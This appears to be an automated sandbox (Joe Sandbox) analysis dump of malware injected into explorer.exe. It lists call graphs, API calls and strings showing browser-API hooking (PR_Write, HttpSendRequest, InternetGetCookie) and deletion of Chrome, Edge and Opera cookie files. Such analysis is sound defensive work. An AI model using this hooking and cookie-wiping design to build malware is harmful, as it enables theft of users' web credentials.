1503->1523 1507 82c09 1507->1497 1509 82721 1508->1509 1510 82691 1508->1510 1522 8105d VirtualFree 1509->1522 1510->1509 1511 81274 VirtualQuery 1510->1511 1512 826a7 1511->1512 1512->1509 1513 82753 1512->1513 1515 8279e 1512->1515 1517 826e9 1512->1517 1536 81000 GetProcessHeap RtlAllocateHeap 1513->1536 1518 827ad 1515->1518 1537 81000 GetProcessHeap RtlAllocateHeap 1515->1537 1516 82768 memcpy 1516->1509 1521 82700 memcpy 1517->1521 1520 827c7 memcpy 1518->1520 1520->1509 1521->1509 1522->1499 1534 81000 GetProcessHeap RtlAllocateHeap 1523->1534 1525 82254 1526 823e3 1525->1526 1535 8104c VirtualAlloc 1526->1535 1528 82633 1528->1507 1529 825b5 lstrcat lstrcat lstrcat lstrcat 1530 823fc 1529->1530 1530->1528 1530->1529 1531 81011 GetProcessHeap HeapFree VirtualQuery 1530->1531 1532 82346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1530->1532 1533 8231f GetProcessHeap RtlAllocateHeap memcpy 1530->1533 1531->1530 1532->1530 1533->1530 1534->1525 1535->1530 1536->1516 1537->1520 1538 82cce 1539 82cd7 1538->1539 1540 82d02 1539->1540 1541 82678 6 API calls 1539->1541 1541->1540 1542 83401 1543 8340a 1542->1543 1544 83442 1542->1544 1545 81274 VirtualQuery 1543->1545 1546 83412 1545->1546 1546->1544 1547 83416 RtlEnterCriticalSection 1546->1547 1552 83132 1547->1552 1550 82f1f 22 API calls 1551 8343a RtlLeaveCriticalSection 1550->1551 1551->1544 1553 8314d 1552->1553 1566 832e8 1552->1566 1553->1566 1573 81000 GetProcessHeap RtlAllocateHeap 1553->1573 1555 831cd 1574 81000 GetProcessHeap RtlAllocateHeap 1555->1574 1557 83212 1558 832d8 1557->1558 1559 8322c lstrlen 1557->1559 1560 81011 3 API calls 1558->1560 1559->1558 1561 8323d 1559->1561 1562 832df 1560->1562 1563 81141 2 API calls 1561->1563 1564 81011 3 API calls 1562->1564 1565 8324b 1563->1565 1564->1566 1565->1558 1575 81000 GetProcessHeap RtlAllocateHeap 1565->1575 1566->1550 1568 83260 1576 81000 GetProcessHeap RtlAllocateHeap 1568->1576 1570 8327f wsprintfA lstrcat 1571 81011 3 API calls 1570->1571 1572 832b8 lstrcat lstrlen RtlMoveMemory 1571->1572 1572->1558 1573->1555 1574->1557 1575->1568 1576->1570 1599 83371 1600 8337a 1599->1600 1601 833b2 1599->1601 1602 81274 VirtualQuery 1600->1602 1603 83382 1602->1603 1603->1601 1604 83386 RtlEnterCriticalSection 1603->1604 1605 83132 13 API calls 1604->1605 1606 833a3 1605->1606 1607 82f1f 22 API calls 1606->1607 1608 833aa RtlLeaveCriticalSection 1607->1608 1608->1601 1609 832f4 1610 83302 1609->1610 1611 8335f 1610->1611 1612 8332b RtlEnterCriticalSection 1610->1612 1613 83342 1612->1613 1614 8334e 1612->1614 1615 82faa 16 API calls 1613->1615 1616 83357 RtlLeaveCriticalSection 1614->1616 1617 83347 1615->1617 1616->1611 1618 82f1f 22 API calls 1617->1618 1618->1614

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00081C08 25 Function_0008104C 0->25 58 Function_00081C82 0->58 72 Function_00081BAF 0->72 86 Function_00081BD2 0->86 1 Function_00083709 2 Function_00081000 1->2 11 Function_00081011 1->11 45 Function_00081363 1->45 78 Function_000815BE 1->78 3 Function_00083401 9 Function_00082F1F 3->9 18 Function_00083132 3->18 51 Function_00081274 3->51 4 Function_00088702 5 Function_00081305 6 Function_00082C18 30 Function_00081141 6->30 35 Function_0008105D 6->35 48 Function_00082678 6->48 99 Function_00082BF2 6->99 7 Function_00081B1B 7->2 7->11 40 Function_0008186C 7->40 8 Function_00082E1B 8->2 8->11 85 Function_00082ED2 9->85 10 Function_0008231F 10->2 11->51 12 Function_00089814 13 Function_00083829 13->1 74 Function_000836A1 13->74 87 Function_000835D4 13->87 14 Function_00081320 15 Function_00089321 16 Function_00082F3D 16->30 17 Function_0008133F 18->2 18->11 18->30 19 Function_00081235 20 Function_00085137 21 Function_00088A37 22 Function_00089337 23 Function_00083449 23->9 23->16 23->25 23->30 23->35 23->51 70 Function_00082FAA 23->70 24 Function_0008104A 26 Function_00081E4C 27 Function_0008224C 27->2 28 Function_00081F4E 29 Function_00083840 31 Function_00082643 32 Function_00089844 33 Function_00082346 33->2 33->11 66 Function_00082296 33->66 34 Function_00082659 36 Function_0008285F 36->30 37 Function_00089955 38 Function_0008966A 39 Function_0008106C 40->2 40->11 40->25 40->39 63 Function_00081090 40->63 84 Function_000817DC 40->84 41 Function_0008926D 42 Function_00082B6E 42->7 42->11 42->35 42->42 52 Function_00082974 42->52 54 Function_0008178C 42->54 96 Function_000827E7 42->96 43 Function_00081261 44 Function_00083862 44->0 44->2 44->5 44->11 44->13 44->14 44->19 44->30 44->43 44->51 56 Function_0008118D 44->56 60 Function_00082D9A 44->60 44->63 67 Function_00082EA8 44->67 69 Function_000812AA 44->69 82 Function_000816C7 44->82 94 Function_00081FE5 44->94 45->17 46 Function_00089763 47 Function_00081765 48->2 48->51 49 Function_00083371 49->9 49->18 49->51 50 Function_00088A71 52->2 52->11 52->25 52->30 52->35 52->36 52->47 71 Function_000828AD 52->71 53 Function_00082C8A 53->35 53->48 53->99 54->2 55 Function_00083D8D 55->2 55->44 55->51 55->55 91 Function_00083BE1 55->91 57 Function_00088B81 93 Function_00081CE5 58->93 59 Function_00085198 61 Function_0008929C 62 Function_00088A9F 64 Function_00088F93 65 Function_00082295 67->8 68 Function_000815A9 70->2 70->11 70->16 70->30 71->30 73 Function_000850A0 74->2 74->11 74->45 83 Function_000814D8 74->83 75 Function_000823A2 76 Function_00081CA5 76->93 77 Function_000833B9 77->9 77->18 77->51 78->2 78->11 78->68 78->78 79 Function_00082CCE 79->48 80 Function_000887CE 81 Function_00088CC3 83->2 83->11 89 Function_000813D7 83->89 98 Function_000813FE 83->98 85->7 85->11 85->35 85->54 86->76 87->2 87->11 87->45 87->83 88 Function_000893D4 90 Function_00088EEF 91->2 91->5 91->13 91->14 91->19 91->30 91->43 91->51 91->63 91->67 91->69 91->94 92 Function_000823E3 92->10 92->11 92->25 92->33 92->75 94->26 94->28 94->51 95 Function_000895E5 96->11 96->51 97 Function_000889F9 98->2 98->11 98->83 98->89 99->27 99->92 100 Function_000832F4 100->9 100->70

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 83862-838de call 81000 GetModuleFileNameA call 81000 GetCurrentProcessId wsprintfA call 8118d CreateMutexA GetLastError 7 838e4-83940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 81000 Sleep lstrcmpi 0->7 8 83bc5-83c3a call 81011 * 2 RtlExitUserThread call 81000 * 2 wsprintfA call 81235 0->8 14 83a0a-83a14 lstrcmpi 7->14 15 83946-83961 GetCommandLineW CommandLineToArgvW 7->15 69 83c3c-83c4c call 81141 8->69 70 83c5e 8->70 17 83a1a-83a24 lstrcmpi 14->17 18 83b14-83b39 call 816c7 GetModuleHandleA GetProcAddress 14->18 19 83bc3-83bc4 15->19 20 83967-8398b call 816c7 GetModuleHandleA GetProcAddress 15->20 17->18 24 83a2a-83a40 lstrcmpi 17->24 34 83b3b-83b47 call 81c08 18->34 35 83b4c-83b59 GetModuleHandleA GetProcAddress 18->35 19->8 32 8398d-83999 call 81c08 20->32 33 8399e-839c0 GetModuleHandleA GetProcAddress 20->33 28 83a42-83a4e GetCommandLineA StrStrIA 24->28 29 83a67-83a71 lstrcmpi 24->29 28->29 37 83a50 28->37 30 83a88-83a92 lstrcmpi 29->30 31 83a73-83a7f GetCommandLineA StrStrIA 29->31 30->19 39 83a98-83aa4 GetCommandLineA StrStrIA 30->39 31->30 38 83a81-83a86 31->38 32->33 41 839c2-839d0 GetModuleHandleA GetProcAddress 33->41 42 839d6-839e8 GetModuleHandleA GetProcAddress 33->42 34->35 44 83b5b-83b67 call 81c08 35->44 45 83b6c-83b79 GetModuleHandleA GetProcAddress 35->45 47 83a55-83a65 GetModuleHandleA 37->47 38->47 39->19 48 83aaa-83ac5 GetModuleHandleA 39->48 41->42 49 83b08-83b0f call 816c7 41->49 50 839f9-83a05 42->50 51 839ea-839f3 GetModuleHandleA GetProcAddress 42->51 44->45 54 83b7b-83b87 call 81c08 45->54 55 83b8c-83bbe call 816c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->55 56 83ace-83ad2 47->56 59 83ad8-83aea call 816c7 call 82d9a 48->59 60 83ac7-83acc GetModuleHandleA 48->60 49->19 61 83b03 call 81c08 50->61 51->49 51->50 54->55 55->19 56->19 56->59 59->49 82 83aec-83af5 call 81274 59->82 60->56 61->49 79 83c4e call 83829 69->79 80 83c53-83c59 call 81261 69->80 73 83c64-83c74 CreateToolhelp32Snapshot 70->73 76 83c7a-83c8e Process32First 73->76 77 83d7d-83d88 Sleep 73->77 81 83d6e-83d70 76->81 77->73 79->80 80->70 85 83c93-83ca5 lstrcmpi 81->85 86 83d76-83d77 CloseHandle 81->86 82->49 93 83af7-83b01 82->93 89 83cda-83ce3 call 812aa 85->89 90 83ca7-83cb5 lstrcmpi 85->90 86->77 97 83d62-83d68 Process32Next 89->97 98 83ce5-83cee call 81305 89->98 90->89 91 83cb7-83cc5 lstrcmpi 90->91 91->89 94 83cc7-83cd4 call 82ea8 91->94 93->61 94->89 94->97 97->81 98->97 102 83cf0-83cf7 call 81320 98->102 102->97 105 83cf9-83d06 call 81274 102->105 105->97 108 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 105->108 108->97
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
                                  • GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
                                  • wsprintfA.USER32 ref: 000838B6
                                    • Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                    • Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                    • Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                    • Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                    • Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                    • Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
                                    • Part of subcall function 0008118D: CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                    • Part of subcall function 0008118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000838CD
                                  • GetLastError.KERNEL32 ref: 000838D3
                                  • RtlInitializeCriticalSection.NTDLL(00086038), ref: 000838F3
                                  • PathFindFileNameA.SHLWAPI(?), ref: 000838FA
                                  • lstrcat.KERNEL32(00085CDE,00000000), ref: 00083910
                                  • Sleep.KERNEL32(000001F4), ref: 0008392A
                                  • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 0008393C
                                  • GetCommandLineW.KERNEL32(?), ref: 0008394F
                                  • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0008397E
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083987
                                  • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 000839AF
                                  • GetProcAddress.KERNEL32(00000000), ref: 000839B2
                                  • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 000839C4
                                  • GetProcAddress.KERNEL32(00000000), ref: 000839C7
                                  • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 000839E1
                                  • GetProcAddress.KERNEL32(00000000), ref: 000839E4
                                  • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 000839EC
                                  • GetProcAddress.KERNEL32(00000000), ref: 000839EF
                                  • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00083A6D
                                  • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A78
                                  • StrStrIA.SHLWAPI(00000000), ref: 00083A7B
                                  • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00083A8E
                                  • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A9D
                                  • StrStrIA.SHLWAPI(00000000), ref: 00083AA0
                                  • GetModuleHandleA.KERNEL32(opera.dll), ref: 00083ABF
                                  • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00083ACC
                                  • CommandLineToArgvW.SHELL32(00000000), ref: 00083956
                                    • Part of subcall function 000816C7: GetCurrentProcessId.KERNEL32 ref: 000816D9
                                    • Part of subcall function 000816C7: GetCurrentThreadId.KERNEL32 ref: 000816E1
                                    • Part of subcall function 000816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                    • Part of subcall function 000816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                    • Part of subcall function 000816C7: CloseHandle.KERNEL32(00000000), ref: 00081758
                                  • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00083A10
                                  • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00083A20
                                  • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00083A30
                                  • GetCommandLineA.KERNEL32(NetworkService), ref: 00083A47
                                  • StrStrIA.SHLWAPI(00000000), ref: 00083A4A
                                  • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00083A5F
                                  • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00083B2C
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083B35
                                  • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00083B52
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083B55
                                  • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00083B72
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083B75
                                  • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00083B99
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083B9C
                                  • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00083BA9
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083BAC
                                  • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00083BB9
                                  • GetProcAddress.KERNEL32(00000000), ref: 00083BBC
                                    • Part of subcall function 00081C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00081C42
                                  • RtlExitUserThread.NTDLL(00000000), ref: 00083BD9
                                  • wsprintfA.USER32 ref: 00083C1F
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                  • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                  • CloseHandle.KERNEL32(00000000), ref: 00083D77
                                  • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Handle$Module$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvCriticalDataDestroyErrorExitFindInitializeLastMemoryMoveMutexParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                                  • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                                  • API String ID: 2480436012-2618538661
                                  • Opcode ID: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                  • Instruction ID: 4080beb071130776e6dd09e7f3c374191be514a04634faf7e68f9b4ce61aff03
                                  • Opcode Fuzzy Hash: b9f6ff7a843870f369ebe3c7313e7c28a896d86895adef5c6821e2817a989fd5
                                  • Instruction Fuzzy Hash: AEA1D370A40716A7E71077719C49E6F3A9CBF91B41B120524F6C1AB292EF79C9028FA6

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                  • FindFirstFileW.KERNELBASE(00000000,?), ref: 000815F7
                                  • lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                  • lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                  • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                  • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00081661
                                  • PathCombineW.SHLWAPI(00000000,?,?), ref: 0008167E
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                  • FindClose.KERNELBASE(00000000), ref: 000816AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                                  • String ID: *.*$Cookies*
                                  • API String ID: 4256701249-3228320225
                                  • Opcode ID: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                  • Instruction ID: 8b79dbc0752a28f5ad1f1006910a533587f018e208c1d15e1b3a33415b5554fa
                                  • Opcode Fuzzy Hash: de4fde3954acede6bbaa2663d65d846f994a8c3001a9ee01889cae48822a856e
                                  • Instruction Fuzzy Hash: 832167712043169BD710BB60AC84ABF7BDCBF89795F040529FAC5D3241EB78DD464BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 225 814d8-81527 call 813fe call 81000 wsprintfW FindFirstFileW 230 81599-815a6 call 81011 225->230 231 81529 225->231 233 8152b-81530 231->233 235 8157e-8158c FindNextFileW 233->235 236 81532-8153d call 813d7 233->236 235->233 237 8158e-81595 FindClose 235->237 236->235 240 8153f-81565 call 81000 wsprintfW 236->240 237->230 243 81570-81579 DeleteFileW call 81011 240->243 244 81567-8156a SetFileAttributesW 240->244 243->235 244->243
                                  APIs
                                    • Part of subcall function 000813FE: wsprintfW.USER32 ref: 0008142A
                                    • Part of subcall function 000813FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00081439
                                    • Part of subcall function 000813FE: wsprintfW.USER32 ref: 00081476
                                    • Part of subcall function 000813FE: RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                    • Part of subcall function 000813FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 000814AF
                                    • Part of subcall function 000813FE: FindClose.KERNEL32(00000000), ref: 000814BA
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • wsprintfW.USER32 ref: 0008150D
                                  • FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                  • wsprintfW.USER32 ref: 00081557
                                  • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                  • DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                  • FindClose.KERNELBASE(00000000), ref: 0008158F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                  • String ID: %s%s$*.*
                                  • API String ID: 2055899612-705776850
                                  • Opcode ID: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                  • Instruction ID: 5bb26f6c1dc7bd09f101a8d25e391cda339d68d8b89c612bbdf1b72f2cef919b
                                  • Opcode Fuzzy Hash: 80c984e5e7019e95e716a10583bb4acde58effe50df50ecf44e95ac5e90c50b4
                                  • Instruction Fuzzy Hash: 1F11B7312007055BE310BB649C49AEF7BDCFF95755F000519FED2922D3EB788A4687A6

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 246 813fe-81444 call 81000 wsprintfW FindFirstFileW 249 814c4-814d5 call 81011 246->249 250 81446 246->250 252 8144a-8144f 250->252 254 814a9-814b7 FindNextFileW 252->254 255 81451-8145c call 813d7 252->255 254->252 256 814b9-814c0 FindClose 254->256 255->254 259 8145e-8148c call 81000 wsprintfW call 814d8 255->259 256->249 263 81491-81499 259->263 264 8149b-8149c RemoveDirectoryW 263->264 265 814a2-814a4 call 81011 263->265 264->265 265->254
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • wsprintfW.USER32 ref: 0008142A
                                  • FindFirstFileW.KERNELBASE(00000000,?), ref: 00081439
                                  • wsprintfW.USER32 ref: 00081476
                                    • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                    • Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                    • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                    • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                    • Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                    • Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                    • Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 0008149C
                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000814AF
                                  • FindClose.KERNEL32(00000000), ref: 000814BA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                  • String ID: %s%s$%s%s\$*.*
                                  • API String ID: 2055899612-4093207852
                                  • Opcode ID: 6c666cde7a4b1b00ec48c3d571aa591b656f76482338ac601443b2c5c9d93ac3
                                  • Instruction ID: 7a152c0ea108eeacf04616a90babe5037b3a522f46ac4564a06091ccefb20d83
                                  • Opcode Fuzzy Hash: 6c666cde7a4b1b00ec48c3d571aa591b656f76482338ac601443b2c5c9d93ac3
                                  • Instruction Fuzzy Hash: D21190302043416BE710BB25EC49AFF76DCFFD5355F000529FAC192292DB79484A8B62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 288 83d8d-83d97 call 81274 291 83d99-83dc2 call 81000 RtlMoveMemory 288->291 292 83e03-83e04 288->292 295 83de8-83dfc NtUnmapViewOfSection 291->295 296 83dc4-83de2 call 81000 RtlMoveMemory 291->296 298 83e0a-83e15 call 83be1 295->298 299 83dfe-83dff 295->299 296->295 306 83e20-83e23 298->306 307 83e17-83e1b call 83d8d 298->307 299->292 301 83e01-83e05 call 83862 299->301 301->298 307->306
                                  APIs
                                    • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00083DAF
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00083DE2
                                  • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00083DEB
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                  • String ID:
                                  • API String ID: 4050682147-0
                                  • Opcode ID: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                  • Instruction ID: dcd502424e309425fe8eb10f29b26712ba654105e7724c8cb1046160188aa2ce
                                  • Opcode Fuzzy Hash: 0bdd0153c5d571ba371ff687eaf063fdcaa43c021457fa3483b6ad3aa1bdb115
                                  • Instruction Fuzzy Hash: 4301D430400601AFDB28BB64EC58BEB3B9CFF85711F118529B5D6871E2CA7B8A41CF65

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                    • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                    • Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                    • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                    • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                  • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00083839,?,00083C53,00000001), ref: 00083731
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083752
                                  • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00083764
                                    • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000815EB
                                    • Part of subcall function 000815BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 000815F7
                                    • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841C8), ref: 00081623
                                    • Part of subcall function 000815BE: lstrcmpiW.KERNEL32(?,000841CC), ref: 00081633
                                    • Part of subcall function 000815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0008164C
                                    • Part of subcall function 000815BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 0008169C
                                    • Part of subcall function 000815BE: FindClose.KERNELBASE(00000000), ref: 000816AB
                                  • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0008377A
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083783
                                  • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0008378F
                                  • RtlZeroMemory.NTDLL(00000000,00001000), ref: 000837A3
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000837AC
                                  • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 000837B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                  • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                  • API String ID: 909495591-1175993956
                                  • Opcode ID: 75eec38487de135512deb4f16878f409bbec5ecf34d88790fb36fbef8542c3dd
                                  • Instruction ID: ec7ff4d470ff25c577ac56c1694f62454c323dd216fa13f948d3d90517649557
                                  • Opcode Fuzzy Hash: 75eec38487de135512deb4f16878f409bbec5ecf34d88790fb36fbef8542c3dd
                                  • Instruction Fuzzy Hash: 7011027034571632F22033615C82FEF258DFFA6BA1F100024F2C56A2C2DED89E0247AA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
